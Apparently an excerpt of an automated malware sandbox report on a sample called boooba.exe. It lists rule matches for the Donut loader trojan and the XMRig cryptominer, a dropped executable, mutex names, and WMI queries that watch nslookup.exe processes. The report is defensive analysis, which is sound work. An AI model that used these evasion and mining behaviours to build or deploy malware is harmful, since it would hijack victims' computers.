Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@26/5@1/1

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03

Source: boooba.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
